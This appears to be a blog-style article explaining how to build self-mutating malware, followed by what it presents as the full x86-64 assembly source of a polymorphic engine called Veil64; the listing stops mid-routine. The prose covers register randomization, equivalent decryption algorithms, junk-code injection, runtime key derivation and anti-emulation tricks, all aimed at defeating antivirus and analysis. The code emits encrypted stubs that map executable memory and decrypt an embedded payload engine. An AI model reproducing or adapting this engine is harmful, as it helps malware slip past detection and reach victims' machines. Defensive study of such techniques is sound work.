Excalibra

The Art of Self-Mutating Malware

Article Summary: This article systematically elaborates on the technical evolution and implementation principles of self-mutating malware, covering the core mechanisms of polymorphic and metamorphic engines. Through two concrete examples — Veil64 and Morpheus — the author, "f00crew" from Hong Kong, analyzes key techniques such as register randomization, algorithmic variants, and intelligent junk code injection. It emphasizes how mutation at the syntactic, structural, and semantic layers can evade signature-based detection while strictly adhering to the principle of behavioral conservation. The author points out that the essence of mutation technology is to keep functionality unchanged while infinitely varying the implementation method, and warns of risks such as code size inflation and stability issues.

Categories: Malware, Binary Security, Vulnerability Analysis, Red Teaming, Penetration Testing

In the beginning, detection relied on signatures — a simple byte string that could uniquely identify a malicious sample. In that era, the process was straightforward: append the virus to the end of a file and patch the entry point. The AV industry quickly responded with signature databases, and for a period, the rhythm of this confrontation was predictable.

This article discusses how to implement self-mutating malicious code: how to build your own polymorphic engine, and some core ideas behind metamorphic code. For malicious code, self-mutation is one of the most elegant paths to solving the detection problem. You no longer just hide yourself — you become “another you” with every replication. This is the purest form of digital evolution.

The concepts we discuss do not depend on any specific implementation. Although the article uses real examples and practical principles from code I have written, the real value lies in understanding the underlying theory of “why mutation is feasible.”

Let’s go back to the beginning. Early VX practices were crude: they directly overwrote files and caused destruction. Some samples would first run the original program and then deliver their own payload. AV quickly caught up, mainly relying on signature scanning to catch samples.

The VX community evolved accordingly and began encrypting their code. The payload remained encrypted and was only unpacked at runtime. AV then turned its attention to the decryptor, so VX authors began dynamically transforming decryption routines. Some families even automatically rotated decryptors — this type later became known as oligomorphic.

Around 1985 to 1990, AV dominated with static signature scanning: string matching and fixed byte patterns made samples easy to hit once they landed on disk. By the early 1990s, the situation began to change. Virus bodies started to be encrypted, exposing only a decryption stub. This stub immediately became AV’s primary hunting target and spurred the development of wildcard and heuristic scanning.

Then polymorphic viruses appeared. The virus would automatically generate a new decryptor at creation time or during each infection. Each instance had its own encryption/decryption routine and evaded scanning by rearranging machine code. This became the defining trait of the 1995–2000 era: the same virus, infinite appearances. Dark Avenger's MtE (the Mutation Engine, circa 1992) had already rewritten the rules of this game.

After that, metamorphic viruses emerged. They no longer relied on an encryption shell. They would rewrite the entire body with every infection. Code structure, control flow, and register usage would all change, but the payload remained unchanged. Between 2000 and 2005, metamorphic samples like Zmist and Simile raised the bar even higher: there was no fixed decryptor to track — only continuous code mutation.

Metamorphic code changes everything, not just the decryptor. It evolved from polymorphism but upgraded from “encryption camouflage” to “overall code reshaping.” Detection difficulty is extremely high; implementation difficulty is equally high, especially at the assembly level.

Overview

When it comes to self-modifying loaders, you have two paths. The first is to keep it small and aggressive: build a lightweight, fast loader that only performs “just enough” mutation — tweak a few places here, quickly shuffle a few there — to slip past scanners without triggering obvious alerts. The code remains compact and raw, but reliable enough.

The other path is full metamorphosis. The loader no longer just fine-tunes itself; it disassembles and rebuilds itself. Layouts are rearranged, instructions are scattered, and entirely new encryption is used on every run. Even if reverse engineers and AV capture one version, the next version will look like a completely unfamiliar sample.

This is not magic. Making it run stably after every mutation is extremely difficult. You must build in validation: count instructions, verify jumps, and perform sanity checks on every change — otherwise it will crash immediately. Even more troublesome is that code size can balloon out of control, eventually losing practicality.

Before discussing specific techniques, we must first clarify: when we talk about executable code, what does “mutation” really mean? It is not just “changing a few bytes,” but the relationship between “form and function,” and how far this relationship can be stretched without destroying behavior.

— The Essence of Identity —

What exactly makes a program “itself”? Is it the order of instructions? Register usage? Memory layout? Or something deeper, like intent?

Mutation’s answer is: identity does not lie in what the code looks like, but in what the code does. As long as two binaries produce the same output for the same input, they are functionally equivalent — even if their assembly is completely different.

Version A:                    Version B:                    Version C:
mov eax, 0                    xor eax, eax                  sub eax, eax
inc ebx                       add ebx, 1                    lea ebx, [ebx+1]

Bytes:                        Bytes:                        Bytes:
B8 00 00 00 00 43             31 C0 83 C3 01                29 C0 8D 5B 01
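The same-behavior claim is easy to sanity-check in a higher-level language. Below is a minimal Python sketch (my own illustration, not taken from any engine) of three equivalent ways to zero a value, mirroring the mov/xor/sub variants above:

```python
# Three different "instruction choices", identical behavior.
def zero_mov(x):
    return 0            # mov eax, 0

def zero_xor(x):
    return x ^ x        # xor eax, eax

def zero_sub(x):
    return x - x        # sub eax, eax

# Behavioral identity: same output for every input.
for x in range(-1000, 1000):
    assert zero_mov(x) == zero_xor(x) == zero_sub(x) == 0
```

The source text differs per function, just as the byte patterns differ per variant, yet no input can distinguish them.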

Three completely different byte patterns that produce identical behavior. This was my “eureka moment” and the starting point for all subsequent implementations.

The core insight is: a program’s identity is not its bytes, but its behavior. If I can generate infinitely many patterns that keep behavior unchanged while making bytes different, signature-based detection will be continuously undermined.

But this also raises harder questions:

  • How to systematically generate equivalent code?
  • How to guarantee correctness across mutations?
  • How to make variants truly unpredictable?

These three questions directly shaped the design of my two engines. They explore different paths to “mutation,” and we call them Veil64 and Morpheus.

Veil64 is a polymorphic code generator used to produce infinite variants of decryption routines: same functionality, infinite forms. Morpheus is a file infector that truly rewrites its own code during execution.

This is the core idea. Everything else is built on top of it: if you cannot hide what is done, then make how it is done unpredictable.

Signatures are the byte patterns that AV focuses on tracking — the “high-risk” digital footprints. Strings, code fragments, hashes — anything that can mark malware will be used. Encryption is a key technique here: it scrambles these recognizable markers, making it difficult for AV to hit them.

Then there is the payload, the part that actually executes the malicious logic. It usually does not run alone but is bound to a stub. This small module decrypts and launches the payload in memory. Because the payload itself is encrypted, AV has difficulty hitting it statically and instead targets the stub. The advantage is that the stub is small and easy to continuously mutate, allowing it to constantly bypass old rules.

This turns the confrontation into a “one-to-many” game, and this mathematical relationship naturally favors the mutation side. Each new variant has a chance to break old detection rules, burn old signatures, and continue to lurk.

“What starts as polymorphic finishes as metamorphic.”

— Levels of Mutation —

Mutation is not just surface-level change — it occurs across layers, including syntactic, structural, and semantic reconstruction.

First, syntactic mutation (grammar-level mutation). This is the outermost layer: replacing equivalent instructions, randomizing register usage, and reordering operations. Appearance changes, result remains the same.

Original:     mov eax, [ebx+4]
Mutated:      push ebx
              add ebx, 4
              mov eax, [ebx]
              sub ebx, 4
              pop ebx

Both snippets load the value at [ebx+4] into eax, but the instruction paths are completely different.

Deeper is structural mutation (structure-level mutation). The change is more profound: reconnecting control flow, rewriting data structures, or even replacing entire algorithms with “different paths but equivalent results.”

The deepest is semantic mutation (semantic-level mutation). It splits functions and reorganizes logic into behaviorally equivalent bodies while ensuring the original intent remains unchanged.

— The Conservation Principle —

No matter how aggressive the mutation, there is one non-negotiable constraint: the program’s semantic behavior must be preserved. What is done (functional output) must remain unchanged; only how it is done (internal implementation mechanism) can change.

The genotype (underlying code structure) can freely drift, mutate, and be obfuscated; the phenotype (externally observable behavior) must remain constant. All mutation techniques can only operate within this boundary.

Naive Approaches

Polymorphism is the purest form of mutation. It essentially expresses the same thing in a thousand different ways. Like a chameleon with a clear goal: core behavior is locked, while everything else continuously changes. No fixed identity, only endless variants.

My first serious attempt to break signature detection was Veil64: a polymorphic code generator capable of generating infinite different ways to write the same decryption logic. The goal was simple: encrypt the payload differently every time and ensure the decryptor never appears the same twice.

— Core Challenges —

Constructing code that can correctly decrypt every time yet looks different each time is non-trivial. Every generated instance must be compact, fast, and clean, leaving no obvious patterns while resisting both static and dynamic analysis.

I started with a simple two-stage design, and understanding this split is key to why it works. The first layer is the stub: a minimal piece of code responsible for memory allocation and decrypting the embedded engine. The second layer is the engine itself: the polymorphic decryptor that actually handles the payload.

┌─────────────────┐
│   Stub Code     │   (119-200 bytes)
├─────────────────┤
│ Encrypted Engine│   (176-300 bytes)
├─────────────────┤
│   Padding       │
└─────────────────┘

Why use two stages? Because this allows the polymorphic engine itself to be encrypted. The stub is small and simple, so even with variants, the signature surface is limited. The real polymorphic power resides in the engine. By encrypting the engine and embedding it inside the stub, complex and variable code is hidden until runtime.

The overall flow is as follows: you call genrat() with a buffer, size, and seed key. The engine first generates a runtime key using multiple entropy sources: RDTSC provides hardware timing, stack pointer provides process differences, and RIP provides position-related randomness. It then builds the polymorphic engine, including random register allocation, selection among four algorithmic variants, and intelligent junk code injection.

Next comes the stub generation stage. Multiple mmap syscall initialization variants are generated, RIP-relative addressing is handled for position independence, and the encrypted engine is embedded. Finally, everything is encrypted and assembled into executable code.

The clever part is that the stub and engine change independently. Even if someone creates a signature for a stub variant, the internal encrypted engine is different every time. Even if they manage to extract and analyze the engine, the next generation will use a completely different set of registers and algorithms.

— The Four Pillars of Polymorphism —

Never use the same set of registers twice.

Hard-coded registers are signature bait. If your decryptor always uses EAX as a counter and EBX as a data pointer, you are practically exposing yourself. Such patterns will be quickly flagged, so the engine randomizes register usage on every generation.

But this is not random grabbing. The selection process avoids conflicts, skips RSP to prevent stack corruption, and ensures no register takes on multiple roles. The underlying logic looks roughly like this:

get_rr:
    call next_random
    and rax, 7
    cmp al, REG_RSP           ; Never use stack pointer
    je get_rr
    cmp al, REG_RAX           ; Avoid RAX conflicts
    je get_rr
    mov [rel reg_base], al    ; Store base register

.retry_count:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je .retry_count
    cmp al, [rel reg_base]    ; Ensure no conflicts
    je .retry_count
    mov [rel reg_count], al

This process is repeated for key registers and all registers used in junk code. Even before considering algorithms and junk injection, there are already 210 possible register combinations (7 × 6 × 5 ordered assignments of three distinct registers, with RSP excluded). That means the same register-level operation can have 210 different appearances, all completely distinct to a signature scanner.

One variant might use RBX for data, RCX for counting, and RDX for the key. The next might switch to RSI for data, RDI for counting, and RBX for the key. Yet another could use extended registers R8, R9, R10. Every combination is functionally equivalent, but the opcode patterns are completely different.

— Four Ways to Say the Same Thing —

Register randomization is only the starting point. True depth comes from algorithmic polymorphism. We do not fix a single decryption flow but cycle between four equivalent algorithms: same output, completely different instruction streams.

This is not simply swapping XOR for ADD. Each variant is carefully designed to guarantee correctness while maximizing signature dispersion.

  • Algorithm 0: ADD → ROL → XOR
  • Algorithm 1: XOR → ROL → XOR
  • Algorithm 2: SUB → ROR → XOR
  • Algorithm 3: XOR → ADD → XOR

All four algorithms produce identical final results, but their instruction sequences and opcode patterns are entirely different.

Each algorithm has a corresponding inverse process in the encryption phase. For example, if encryption uses XOR → ROR → SUB, decryption uses ADD → ROL → XOR. Mathematically they cancel perfectly, but the instruction flows never look the same. Opcode patterns, instruction lengths, and register usage all change. To a signature scanner, they appear as completely different routines.
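To see why such pairs cancel, here is a hedged byte-level sketch in Python (my own illustration; the article does not specify operand widths, rotation amounts, or the key schedule, so a single-byte key and a rotation of 3 are assumed) of an XOR → ROR → SUB encryption with its ADD → ROL → XOR inverse:

```python
MASK = 0xFF  # operate on single bytes for clarity

def rol8(b, n):
    """Rotate an 8-bit value left by n (1-7) bits."""
    return ((b << n) | (b >> (8 - n))) & MASK

def ror8(b, n):
    """Rotate an 8-bit value right by n (1-7) bits."""
    return ((b >> n) | (b << (8 - n))) & MASK

def encrypt_byte(b, k):
    # XOR -> ROR -> SUB, each step using the same byte key k
    return (ror8(b ^ (k & MASK), 3) - (k & MASK)) & MASK

def decrypt_byte(b, k):
    # ADD -> ROL -> XOR: each step undoes its counterpart in reverse order
    return rol8((b + (k & MASK)) & MASK, 3) ^ (k & MASK)

# Mathematically the two chains cancel exactly for every byte value.
for b in range(256):
    assert decrypt_byte(encrypt_byte(b, 0x5A), 0x5A) == b
```

Because each step is individually invertible and the inverse chain runs in reverse order, correctness holds regardless of which of the equivalent instruction encodings the generator emits for each step.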

— Intelligent Junk Code —

Most polymorphic engines fail here: they either stuff random bytes or pile on obvious NOP sleds, practically shouting “I’m malware.” That is low-level. True polymorphism uses “intentional-looking” junk code that blends into the context and mimics normal compiler output.

Junk injection is not purely random — it is structured. It uses no-net-effect PUSH/POP pairs that look like register preservation, XOR reg, reg to imitate common zeroing initialization, and MOV reg, reg that resembles typical compiler register shuffling.

This is just a very basic example. Some engines do it more aggressively. The key point is to make it look like real developer code. PUSH RAX followed by POP RBX can masquerade as register saving and transfer; XOR RAX, RAX looks like legitimate initialization; MOV RAX, RAX resembles dead code left by an optimizer. Functionally they add no value, but visually they blend in.

Junk injection also deliberately varies in density: sometimes heavy, sometimes sparse; sometimes clumped, sometimes scattered in loops. There is no fixed “junk zone” that can be isolated — only code that looks normal every single time.

— Breaking Linear Analysis —

Static analysis relies on linear flow: traversing code, building graphs, and extracting patterns. So we break it. Random jumps are inserted to skip over junk regions, directly destroying straight-line logic.

Jump generation is subtle. Sometimes 2-byte short jumps, sometimes 5-byte long jumps; they may skip only 1 byte or over a dozen. The skipped junk content is randomized every time. Even if the analyzer follows the jump path, its rhythm is disrupted on every run.

This produces unpredictable control flow and interferes with both static and dynamic analysis. Static tools face non-linear instruction streams mixed with random data; dynamic tools encounter different execution paths on every run, making it difficult to build a stable behavioral profile.

These jumps also serve a dual purpose: they mimic compiler output. Real compiled code is full of branches, jumps, and irregular flow. Injecting our own jumps increases this “natural complexity,” helping the code blend more seamlessly.

— The Entropy Problem —

Hard-coded keys or constants are traps. I learned this the hard way: early versions embedded the constant 0xDEADBEEF in every variant. No matter how much the rest of the code changed, that fixed value instantly became a red flag.

The solution is runtime key generation: no fixed constants, no repetition, no nail-down patterns. The key is reconstructed on every execution, drawing from multiple entropy sources that vary with execution round, process, and machine.

Entropy comes from multiple sources. RDTSC provides high-resolution microsecond-level timing; the stack pointer changes with processes and function calls; RIP brings position-related randomness under ASLR; the user key introduces input-driven variation.

The real strength lies in how these values are combined. It is not simple XOR, but involves rotations, complements, and mixing with stack-related values. Each transformation step depends on the current state, forming a dependency chain that ultimately produces a truly unpredictable key.

— Randomness Is Critical —

Excellent polymorphic capability depends on high-quality randomness. Many engines use basic linear congruential generators or simple incrementing counters — both easily produce predictable patterns that can be flagged. I prefer the XorShift PRNG: fast, long period (2^64−1), and passes strong statistical randomness tests without repeating for a very long time.
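For reference, one step of a textbook xorshift64 looks like the following (a sketch using Marsaglia's published 13/7/17 shift triple; the engine's own shift constants are not given in the article and may differ):

```python
MASK64 = (1 << 64) - 1  # emulate 64-bit register wraparound in Python

def xorshift64(state):
    """One step of Marsaglia's xorshift64.

    Over nonzero 64-bit states this mapping is a permutation with
    full period 2^64 - 1, so the stream never repeats prematurely.
    """
    state ^= (state << 13) & MASK64
    state ^= state >> 7
    state ^= (state << 17) & MASK64
    return state & MASK64

# A nonzero state never maps to zero, so the generator cannot get stuck.
s = 0x9E3779B97F4A7C15
for _ in range(1000):
    s = xorshift64(s)
    assert s != 0
```

Three shifts and three XORs per step keep it far cheaper than a cryptographic PRNG while avoiding the short, highly regular cycles of naive linear congruential generators.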

Under ASLR, code is loaded at different addresses each time. Hard-coded absolute addresses will cause the polymorphic decryptor to fail if it lands in an unexpected location. The solution is RIP-relative addressing, with offsets calculated based on the current instruction pointer.

— Just-in-Time Machine Code Generation —

This is where we reach the real core. You cannot simply rearrange pre-written assembly and call it polymorphic. The engine generates raw x64 machine code on the fly, building every instruction byte by byte. Opcodes and operands are computed dynamically based on the current register allocation and algorithm choice.

The ModRM byte is especially critical in x64: it encodes which registers are used. By calculating this byte dynamically, the engine can implement the same operation with any register combination, producing different bytes — and therefore different signatures.
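As a concrete sketch of the encoding rule (standard x86-64 instruction-format knowledge, not Veil64's own code), the register-direct ModRM byte packs three bit fields, and swapping registers changes only this byte:

```python
def modrm(mod, reg, rm):
    """Assemble an x86 ModRM byte: [mod:2][reg:3][rm:3]."""
    return (mod << 6) | (reg << 3) | rm

# Standard 3-bit register numbers for the low eight 64-bit registers.
REG = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3,
       "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7}

# mod = 0b11 selects register-direct operands.
# `xor rax, rax` encodes as 48 31 C0: REX.W, opcode 0x31, ModRM 0xC0.
assert modrm(0b11, REG["rax"], REG["rax"]) == 0xC0
# Same opcode, different registers: `xor rdi, rdi` is 48 31 FF.
assert modrm(0b11, REG["rdi"], REG["rdi"]) == 0xFF
```

The two assertions match the byte listings shown earlier in the variant dumps (31 C0 and 48 31 FF), which is exactly the point: one formula, many byte patterns.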

The same polymorphic thinking applies to all syscall parameters. Multiple construction methods are used to avoid pattern matching.

— Performance and Scalability —

Basic generation averages 9 to 13 milliseconds per variant, or roughly 4,500 to 6,500 variants per minute: more than enough to overwhelm signature databases. Speed is not higher because each variant undergoes register renaming, flow randomization, intelligent junk injection, and anti-debug checks.

Generation time fluctuates by ±3 to 4 ms by design to avoid predictability; stable timing would aid detection. The engine maintains this jitter by varying instruction order, junk block size, and encryption rounds.

Static memory footprint is approximately 340 to 348 KB — far larger than toy 4 KB engines. This includes precomputed transformation tables, runtime mutation logic, and anti-emulation traps. Per-variant memory usage remains stable with no leaks or growth.

Code size fluctuates between 180 bytes and 1.2 KB. Compact variants favor speed; balanced variants strike a compromise; complex variants maximize complexity to stress AV engines.

— What Variants Look Like —

Variant #1: Size 335, Key 0x4A4BDC5C3AEAC0AD
48 C7 C0 0A 00 00 00    mov rax, 10
48 FF C8                dec rax
50                      push rax
58                      pop rax
90                      nop
48 31 FF                xor rdi, rdi
...

Variant #2: Size 368, Key 0x6BAAA583D73FA32B
50                      push rax
58                      pop rax
50                      push rax
58                      pop rax
48 31 C0                xor rax, rax
48 83 C0 09             add rax, 9
...

Variant #3: Size 385, Key 0x5C3F1EDF85C0D55E
90                      nop
90                      nop
50                      push rax
58                      pop rax
48 C7 C0 09 00 00 00    mov rax, 9
...

Look at the differences. Variant #1 sets RAX by loading 10 then decrementing. Variant #2 uses PUSH/POP junk first, then XOR/ADD. Variant #3 starts with NOPs, inserts another set of junk, then loads directly. The result is the same (RAX = 9), but the method is completely different.

Size fluctuation can be substantial. These three samples happen to differ by no more than 50 bytes, but the engine can produce variants ranging from compact 180-byte versions to large 1200-byte versions, depending on the intensity of junk injection and obfuscation.

The engine classifies variants into three categories by structure and complexity. Compact types (≈295–350 bytes) minimize junk and prioritize speed; balanced types (up to 400 bytes) compromise between obfuscation and stability; complex types (up to 500 bytes) layer more polymorphic techniques and anti-analysis features.

With four algorithms combined with 210 register permutations, there are already 840 base variants before adding junk and control-flow obfuscation. Introducing variable junk injection, diverse jump patterns, and multiple stub initialization methods expands the variant space into the millions.

The key is not just quantity, but “functional equivalence + signature diversity.” Every variant can correctly decrypt the payload, yet appears distinctly different from a signature-detection perspective.

Effective polymorphism maximizes signature diversity without degrading correctness. Generating billions of variants is meaningless if many are broken or still share detectable patterns. Correctness and diversity scale must hold simultaneously.

— Built-in Anti-Analysis Design —

Emulation engines usually struggle with variable timing, and junk code injection creates unpredictable execution durations. Key generation dependent on stack state makes the same variant behave differently across process contexts. Reliance on hardware timestamps further increases emulation cost because it requires accurate RDTSC simulation.

With no fixed constants or strings, static analysis tools struggle because there are almost no grep-able or fingerprintable anchors. Polymorphic control flow breaks linear analysis, while the encrypted embedded engine hides core logic until runtime.

Dynamic analysis is also disrupted by “legitimate-looking, functionally neutral” junk code. Multiple execution paths generate different behavioral traces on every run. Runtime key derivation ensures each execution has a unique key, making results difficult to reuse even if tracing succeeds.

Anti-analysis features are not optional — they are part of the system. Every polymorphic technique serves two purposes simultaneously: evading signatures and increasing analysis cost.

Veil64 Full Source Code

;------------------------------------------------------------
;   [ V E I L 6 4 ]
;------------------------------------------------------------
;   Type:           Polymorphic Engine / Stub Generator
;   Platform:       x86_64 Linux
;   Size:           ~4KB Engine + Custom Stub
;                   Runtime shellcode obfuscation, encryption,
;                   and stealth execution via mmap + RIP tricks.
;
;                                                   0xf00sec
;------------------------------------------------------------

section .text

global genrat
global exec_c
global _start

; x64 opcodes
%define PUSH_REG           0x50
%define POP_REG            0x58
%define ADD_MEM_REG        0x01
%define ADD_REG_IMM8       0x83
%define ROL_MEM_IMM        0xC1
%define XOR_MEM_REG        0x31
%define TEST_REG_REG       0x85
%define JNZ_SHORT          0x75
%define JZ_SHORT           0x74
%define CALL_REL32         0xE8
%define JMP_REL32          0xE9
%define JMP_SHORT          0xEB
%define RET_OPCODE         0xC3
%define NOP_OPCODE         0x90
%define JNZ_LONG           0x0F85
%define FNINIT_OPCODE      0xDBE3
%define FNOP_OPCODE        0xD9D0

; register encoding
%define REG_RAX            0
%define REG_RCX            1
%define REG_RDX            2
%define REG_RBX            3
%define REG_RSP            4
%define REG_RBP            5
%define REG_RSI            6
%define REG_RDI            7

section .data

stub_key:               dq 0xDEADBEEF            ; runtime key
sec_key:                dq 0x00000000
engine_size:            dq 0
dcr_eng:                dq 0
stub_sz:                dq 0
sz:                     dq 0

seed:                   dq 0                     ; PRNG state
p_entry:                dq 0                     ; output buffer
key:                    dq 0                     ; user key
reg_base:               db 0                     ; selected registers
reg_count:              db 0
reg_key:                db 0
junk_reg1:              db 0                     ; junk registers
junk_reg2:              db 0
junk_reg3:              db 0
prolog_set:             db 0
fpu_set:                db 0
jmp_back:               dq 0
alg0_dcr:               db 0                     ; algorithm selector

align 16
entry:
times 4096 db 0                                 ; engine storage
exit:

section .text

; main generator entry point
genrat:
    push rbp
    mov rbp, rsp
    sub rsp, 64
    push rbx
    push r12
    push r13
    push r14
    push r15

    test rdi, rdi                               ; validate params
    jz .r_exit
    test rsi, rsi
    jz .r_exit
    cmp rsi, 1024                               ; min buffer size
    jb .r_exit

    mov [rel p_entry], rdi
    mov [rel sz], rsi
    mov [rel key], rdx

    call gen_runtm                              ; generate runtime keys

    lea rdi, [rel entry]
    mov r12, rdi
    call gen_reng                               ; build engine

    mov rax, rdi                                ; calculate engine size
    sub rax, r12
    mov [rel engine_size], rax

    mov rdi, [rel p_entry]
    call unpack_stub                            ; build stub
    call enc_bin                                ; encrypt payload

    mov rax, [rel stub_sz]                      ; total
    test rax, rax
    jnz .calc_sz
    mov rax, rdi
    sub rax, [rel p_entry]

.calc_sz:
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    add rsp, 64
    pop rbp
    ret

.r_exit:
    xor rax, rax
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    add rsp, 64
    pop rbp
    ret

; generate engine
gen_reng:
    push rdi
    push rsi
    push rcx

    rdtsc
    xor rax, [rel key]
    mov rbx, 0x5DEECE66D
    xor rax, rbx
    mov rbx, rax
    shl rbx, 13
    xor rax, rbx
    mov rbx, rax
    shr rbx, 17
    xor rax, rbx
    mov rbx, rax
    shl rbx, 5
    xor rax, rbx
    xor rax, rsp
    mov [rel seed], rax

    push rdi                                    ; clear state
    lea rdi, [rel reg_base]
    mov rcx, 16
    xor rax, rax
    rep stosb
    pop rdi

    pop rcx
    pop rsi
    pop rdi

    call get_rr                                 ; select random registers
    call set_al                                 ; pick decrypt algorithm
    call gen_p                                  ; generate prologue

    call yes_no                                 ; random junk insertion
    test rax, rax
    jz .skip_pr
    call gen_trash

.skip_pr:
    call trash

    call yes_no
    test rax, rax
    jz .skip_dummy
    call gen_dummy

.skip_dummy:
    call gen_dec                                ; main decrypt loop

    call yes_no
    test rax, rax
    jz .skip_prc
    call gen_trash

.skip_prc:
    mov al, RET_OPCODE
    stosb

    cmp qword [rel jmp_back], 0                 ; conditional jump back
    je .skip_jmp

    mov ax, JNZ_LONG
    stosw
    mov rax, [rel jmp_back]
    sub rax, rdi
    sub rax, 4
    stosd

.skip_jmp:
    call trash
    mov al, RET_OPCODE
    stosb
    ret

; encrypt generated engine
enc_bin:
    push rdi
    push rsi
    push rcx
    push rax
    push rbx

    lea rdi, [rel entry]
    mov rcx, [rel engine_size]

    ; validate engine size
    test rcx, rcx
    jz .enc_done
    cmp rcx, 4096
    ja .enc_done
    cmp rcx, 10
    jb .enc_done

    ; encrypt in place
    mov rax, [rel stub_key]
    mov rsi, rcx

.enc_loop:
    test rsi, rsi
    jz .enc_done
    xor byte [rdi], al
    rol rax, 7
    inc rdi
    dec rsi
    jmp .enc_loop

.enc_done:
    pop rbx
    pop rax
    pop rcx
    pop rsi
    pop rdi
    ret

; build stub wrapper
unpack_stub:
    push rbx
    push rcx
    push rdx
    push r12

    mov r12, rdi

    call bf_boo                                 ; bounds check
    jae .stub_flow

    call stub_trash
    call gen_stub_mmap
    call stub_decrypt

    mov rax, rdi
    sub rax, r12
    mov [rel stub_sz], rax

    call stub_trash

    ; update size after junk
    mov rax, rdi
    sub rax, r12

    ; check space for encrypted engine
    mov rbx, rax
    add rax, [rel engine_size]
    cmp rax, [rel sz]
    ja .stub_flow

    ; embed encrypted engine
    lea rsi, [rel entry]
    mov rcx, [rel engine_size]
    test rcx, rcx
    jz .skip_embed
    rep movsb

.skip_embed:
    ; final size calculation
    mov rax, rdi
    sub rax, r12
    mov [rel stub_sz], rax

    pop r12
    pop rdx
    pop rcx
    pop rbx
    ret

.stub_flow:
    xor rax, rax
    mov [rel stub_sz], rax
    pop r12
    pop rdx
    pop rcx
    pop rbx
    ret

; generate stub junk
stub_trash:
    call next_random
    and rax, 7                                  ; 0-7 junk instructions
    mov rcx, rax
    test rcx, rcx
    jz .no_garbage

.trash_loop:
    call next_random
    and rax, 3                                  ; choose junk type
    cmp al, 0
    je .gen_nop
    cmp al, 1
    je .gen_push_pop
    cmp al, 2
    je .gen_xor_self
    jmp .gen_mov_reg

.gen_nop:
    mov al, 0x90
    stosb
    jmp .next_garbage

.gen_push_pop:
    mov al, 0x50                                ; push rax
    stosb
    mov al, 0x58                                ; pop rax
    stosb
    jmp .next_garbage

.gen_xor_self:
    mov al, 0x48                                ; rex.w
    stosb
    mov al, 0x31                                ; xor rax,rax
    stosb
    mov al, 0xC0
    stosb
    jmp .next_garbage

.gen_mov_reg:
    mov al, 0x48                                ; rex.w
    stosb
    mov al, 0x89                                ; mov rax,rax
    stosb
    mov al, 0xC0
    stosb

.next_garbage:
    loop .trash_loop

.no_garbage:
    ret

; generate mmap syscall stub
gen_stub_mmap:
    ; mmap setup
    call next_random
    and rax, 3                                  ; choose method
    cmp al, 0
    je .mmap_method_0
    cmp al, 1
    je .mmap_method_1
    cmp al, 2
    je .mmap_method_2
    jmp .mmap_method_3

.mmap_method_0:
    ; mov rax, 9
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 9                                  ; mmap syscall
    stosd
    jmp .mm_continue

.mmap_method_1:
    ; xor rax,rax; add rax,9
    mov al, 0x48
    stosb
    mov al, 0x31
    stosb
    mov al, 0xC0
    stosb
    mov al, 0x48
    stosb
    mov al, 0x83
    stosb
    mov al, 0xC0
    stosb
    mov al, 9
    stosb
    jmp .mm_continue

.mmap_method_2:
    ; mov rax,10; dec rax
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 10
    stosd
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC8
    stosb
    jmp .mm_continue

.mmap_method_3:
    ; mov rax,18; shr rax,1
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 18
    stosd
    mov al, 0x48
    stosb
    mov al, 0xD1
    stosb
    mov al, 0xE8
    stosb

.mm_continue:
    call stub_trash

    ; rdi setup
    call next_random
    and rax, 1
    test rax, rax
    jz .rdi_method_0

    ; mov rdi,0
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC7
    stosb
    mov eax, 0
    stosd
    jmp .rdi_done

.rdi_method_0:
    ; xor rdi,rdi
    mov al, 0x48
    stosb
    mov al, 0x31
    stosb
    mov al, 0xFF
    stosb

.rdi_done:

    ; mov rsi,4096
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC6
    stosb
    mov eax, 4096
    stosd

    ; mov rdx,7 (rwx)
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC2
    stosb
    mov eax, 7
    stosd

    ; mov r10,0x22 (private|anon)
    mov al, 0x49
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC2
    stosb
    mov eax, 0x22
    stosd

    ; mov r8,-1
    mov al, 0x49
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 0xFFFFFFFF
    stosd

    ; mov r9,0
    mov al, 0x4D
    stosb
    mov al, 0x31
    stosb
    mov al, 0xC9
    stosb

    ; syscall
    mov al, 0x0F
    stosb
    mov al, 0x05
    stosb
    ret

; generate decryption stub
stub_decrypt:
    ; mov rbx,rax (save mmap result)
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xC3
    stosb

    ; calculate RIP-relative offset to embedded engine
    mov r15, rdi

    mov rax, [rel p_entry]
    mov rdx, [rel stub_sz]
    test rdx, rdx
    jnz .usszz
    ; fallback calculation
    mov rdx, rdi
    sub rdx, [rel p_entry]
    add rdx, 100

.usszz:
    add rax, rdx                                ; engine position

    ; RIP-relative calculation
    mov rbx, r15
    add rbx, 7                                  ; after LEA instruction
    sub rax, rbx
    mov rdx, rax                                ; keep disp32 (AL is reused for opcode bytes)

    ; lea rsi,[rip+offset]
    mov al, 0x48
    stosb
    mov al, 0x8D
    stosb
    mov al, 0x35
    stosb
    mov eax, edx
    stosd

    ; mov rcx,engine_size
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC1
    stosb
    mov rax, [rel engine_size]
    test rax, rax
    jnz .engine_sz
    mov rax, 512

.engine_sz:
    cmp rax, 65536
    jbe .size_ok
    mov rax, 65536

.size_ok:
    stosd

    ; mov rdx,stub_key
    mov al, 0x48
    stosb
    mov al, 0xBA
    stosb
    mov rax, [rel stub_key]
    stosq

    ; decryption loop
    mov r14, rdi

    ; test rcx,rcx
    mov al, 0x48
    stosb
    mov al, 0x85
    stosb
    mov al, 0xC9
    stosb

    ; jz done
    mov al, 0x74
    stosb
    mov al, 0x0E                                ; skip the 14-byte loop body
    stosb

    ; xor [rsi],dl
    mov al, 0x30
    stosb
    mov al, 0x16
    stosb

    ; rol rdx,7
